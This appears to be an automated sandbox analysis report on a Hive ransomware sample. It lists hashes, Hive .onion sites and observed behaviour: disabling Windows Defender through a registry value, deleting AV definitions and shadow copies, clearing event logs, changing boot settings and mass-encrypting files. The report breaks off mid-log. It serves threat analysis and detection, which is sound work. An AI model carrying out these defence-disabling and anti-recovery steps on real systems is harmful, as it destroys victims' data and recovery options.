Analysis
-
max time kernel
133s -
max time network
132s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Resource
win10-en-20211208
General
-
Target
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
-
Size
2.7MB
-
MD5
8486072a80d4cef5b18407ffa74a965d
-
SHA1
b3bbdd7d990092b8545c04bf6cea5572c1d1cb4c
-
SHA256
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1
-
SHA512
dea0bc47c7b3b178e128d2349ede55d7c13cd5884ce49a178668b9e0a527f2f415eef432a5523c8c129436e37d8a7f424ce0dbebf95b89e22a9d7a1c15c083e5
Malware Config
Extracted
C:\JZRG_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2128 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2064 bcdedit.exe 2088 bcdedit.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\UnregisterWait.raw.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_i20tSIhoOHU0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Users\Admin\Pictures\UseExport.tif.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_xLXNMQ1iWqo0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Users\Admin\Pictures\ImportDismount.crw.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_xZg6BXps2tw0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File renamed C:\Users\Admin\Pictures\CompareApprove.crw => C:\Users\Admin\Pictures\CompareApprove.crw.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_FfZS0VKx0Kk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Users\Admin\Pictures\CompareApprove.crw.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_FfZS0VKx0Kk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File renamed C:\Users\Admin\Pictures\SuspendTrace.tiff => C:\Users\Admin\Pictures\SuspendTrace.tiff.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_G3suovYdTz40.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Users\Admin\Pictures\SuspendTrace.tiff.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_G3suovYdTz40.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File renamed C:\Users\Admin\Pictures\UnregisterWait.raw => C:\Users\Admin\Pictures\UnregisterWait.raw.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_i20tSIhoOHU0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File renamed C:\Users\Admin\Pictures\UseExport.tif => C:\Users\Admin\Pictures\UseExport.tif.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_xLXNMQ1iWqo0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File renamed C:\Users\Admin\Pictures\ImportDismount.crw => C:\Users\Admin\Pictures\ImportDismount.crw.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_xZg6BXps2tw0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File renamed C:\Users\Admin\Pictures\StopSync.png => C:\Users\Admin\Pictures\StopSync.png.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_fsKeLzuyLFY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Users\Admin\Pictures\StopSync.png.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_fsKeLzuyLFY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_oWYjzLyp6yk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_e2X7LLyTugc0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_06qPBXuOG-80.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_eG7t4wIM4TQ0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099194.GIF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_jM5LjdJqgvk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MENU98.POC.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_L7uachoiNTI0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_HVUvy_RpihA0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_KZsvxrl2NBs0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_qlHGXIqsH1o0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\BUTTON.GIF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_m306ytnFTL80.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN105.XML.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_EheWWlP_wjk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_cmZN4rvGaEY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_-lLl156IvJQ0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_AWRCaRdXu8w0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00828_.WMF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_SqOU4kxocc80.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_rMxsJFPyrDM0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageSlice.gif.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_uWWw-QDjqHg0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALENDAR.DPV.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_3m-EqTu10fU0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_s7mGBtlFVv40.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_T6Yjph_S2Lw0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_VeM3tjMUwmI0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_CO14NKofbJY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_pl-VrECAer40.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_KbKXdeLFaN80.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_Hs9fJMyfOCI0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_w6Sc5yu7g5U0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_B3aDEzcAYpc0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\js\slideShow.js 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_HjLP3ZGNsn40.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EXPEDITN\EXPEDITN.ELM.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_pOpFcjONU4Q0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Horizon.thmx.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_hEi0I9eZcqk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.IN.XML.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_xA0uzD8gJXg0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Wordcnvpxy.cnv.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_dtKW3_u_tpA0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_QVKFCpQT9t00.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_wF9uwQ25Ajo0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\currency.html 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CANYON\JZRG_HOW_TO_DECRYPT.txt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Gradient.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_disable.gif.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_oomvr8nEFiY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_fM2_7w4QIAg0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_SJRG9KtMu_c0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Windows Media Player\en-US\WMPSideShowGadget.exe.mui 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00157_.WMF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_hbTmsjyOBT40.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.CN.XML.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_mnp9TVqcu440.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\gadget.xml 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGHEADING.XML.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_Np2xRzZVchY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_UTQ6oz7PDVs0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\install.ins.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_ODhth-QhzEU0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105336.WMF.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_ZzS2KSEt7ls0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Solstice.eftx.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_3pfXx5qYdhE0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.NZ.XML.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_t4TTEKBriwk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_GfLL8d4dGiA0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_89ikouwv29c0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar.LIoXfRQifKiRdALbzLl5LG9qKMqeeYAaozvsoy7Jzqb_tN3yDuOERBY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1080 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exepid process 2160 powershell.exe 2260 powershell.exe 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1852 wevtutil.exe Token: SeBackupPrivilege 1852 wevtutil.exe Token: SeSecurityPrivilege 924 wevtutil.exe Token: SeBackupPrivilege 924 wevtutil.exe Token: SeSecurityPrivilege 1892 wevtutil.exe Token: SeBackupPrivilege 1892 wevtutil.exe Token: SeIncreaseQuotaPrivilege 828 wmic.exe Token: SeSecurityPrivilege 828 wmic.exe Token: SeTakeOwnershipPrivilege 828 wmic.exe Token: SeLoadDriverPrivilege 828 wmic.exe Token: SeSystemProfilePrivilege 828 wmic.exe Token: SeSystemtimePrivilege 828 wmic.exe Token: SeProfSingleProcessPrivilege 828 wmic.exe Token: SeIncBasePriorityPrivilege 828 wmic.exe Token: SeCreatePagefilePrivilege 828 wmic.exe Token: SeBackupPrivilege 828 wmic.exe Token: SeRestorePrivilege 828 wmic.exe Token: SeShutdownPrivilege 828 wmic.exe Token: SeDebugPrivilege 828 wmic.exe Token: SeSystemEnvironmentPrivilege 828 wmic.exe Token: SeRemoteShutdownPrivilege 828 wmic.exe Token: SeUndockPrivilege 828 wmic.exe Token: SeManageVolumePrivilege 828 wmic.exe Token: 33 828 wmic.exe Token: 34 828 wmic.exe Token: 35 828 wmic.exe Token: SeIncreaseQuotaPrivilege 1344 wmic.exe Token: SeSecurityPrivilege 1344 wmic.exe Token: SeTakeOwnershipPrivilege 1344 wmic.exe Token: SeLoadDriverPrivilege 1344 wmic.exe Token: SeSystemProfilePrivilege 1344 wmic.exe Token: SeSystemtimePrivilege 1344 wmic.exe Token: SeProfSingleProcessPrivilege 1344 wmic.exe Token: SeIncBasePriorityPrivilege 1344 wmic.exe Token: SeCreatePagefilePrivilege 1344 wmic.exe Token: SeBackupPrivilege 1344 wmic.exe Token: SeRestorePrivilege 1344 wmic.exe Token: SeShutdownPrivilege 1344 wmic.exe Token: SeDebugPrivilege 1344 wmic.exe Token: SeSystemEnvironmentPrivilege 1344 wmic.exe Token: SeRemoteShutdownPrivilege 1344 wmic.exe Token: SeUndockPrivilege 1344 wmic.exe Token: SeManageVolumePrivilege 1344 wmic.exe Token: 33 1344 wmic.exe Token: 34 1344 wmic.exe Token: 35 1344 wmic.exe Token: SeIncreaseQuotaPrivilege 1344 wmic.exe Token: SeSecurityPrivilege 1344 wmic.exe Token: SeTakeOwnershipPrivilege 1344 wmic.exe Token: SeLoadDriverPrivilege 1344 wmic.exe Token: SeSystemProfilePrivilege 1344 wmic.exe Token: SeSystemtimePrivilege 1344 wmic.exe Token: SeProfSingleProcessPrivilege 1344 wmic.exe Token: SeIncBasePriorityPrivilege 1344 wmic.exe Token: SeCreatePagefilePrivilege 1344 wmic.exe Token: SeBackupPrivilege 1344 wmic.exe Token: SeRestorePrivilege 1344 wmic.exe Token: SeShutdownPrivilege 1344 wmic.exe Token: SeDebugPrivilege 1344 wmic.exe Token: SeSystemEnvironmentPrivilege 1344 wmic.exe Token: SeRemoteShutdownPrivilege 1344 wmic.exe Token: SeUndockPrivilege 1344 wmic.exe Token: SeManageVolumePrivilege 1344 wmic.exe Token: 33 1344 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1524 wrote to memory of 544 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 544 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 544 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 544 wrote to memory of 756 544 net.exe net1.exe PID 544 wrote to memory of 756 544 net.exe net1.exe PID 544 wrote to memory of 756 544 net.exe net1.exe PID 1524 wrote to memory of 752 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 752 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 752 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 752 wrote to memory of 568 752 net.exe net1.exe PID 752 wrote to memory of 568 752 net.exe net1.exe PID 752 wrote to memory of 568 752 net.exe net1.exe PID 1524 wrote to memory of 304 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 304 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 304 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 304 wrote to memory of 1416 304 net.exe net1.exe PID 